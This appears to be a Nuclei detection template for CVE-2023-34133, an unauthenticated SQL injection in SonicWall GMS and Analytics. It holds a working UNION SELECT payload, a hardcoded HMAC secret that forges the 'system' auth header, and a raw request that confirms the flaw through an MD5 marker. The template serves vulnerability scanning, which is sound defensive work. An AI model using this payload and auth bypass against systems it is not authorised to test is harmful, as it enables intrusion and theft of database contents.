id: CVE-2023-34133

info:
  name: SonicWall GMS and Analytics - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34133
    - http://packetstormsecurity.com/files/174571/Sonicwall-GMS-9.9.9320-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-34133
    cwe-id: CWE-89
    epss-score: 0.64273
    epss-percentile: 0.9846
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:"-1381126564"
    fofa-query: icon_hash="-1381126564"
  tags: cve2023,cve,sonicwall,sqli,injection,vkev,vuln

variables:
  num: "999999999"
  query: "' union select (select ID from SGMSDB.DOMAINS), '', '', '', '', '', (select MD5({{num}})),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/{{url_encode(query)}} HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
# digest: 4a0a00473045022100e65e3a5bbc8996286d9872e8ee2397d4fa95aff9d05a4bdc93de20dec46af62302206ebf6922080702bcc41c16f54d08e42858bc403164694ebba1ee9c2a4a615b9e:922c64590222798bb761d5b6d8e72950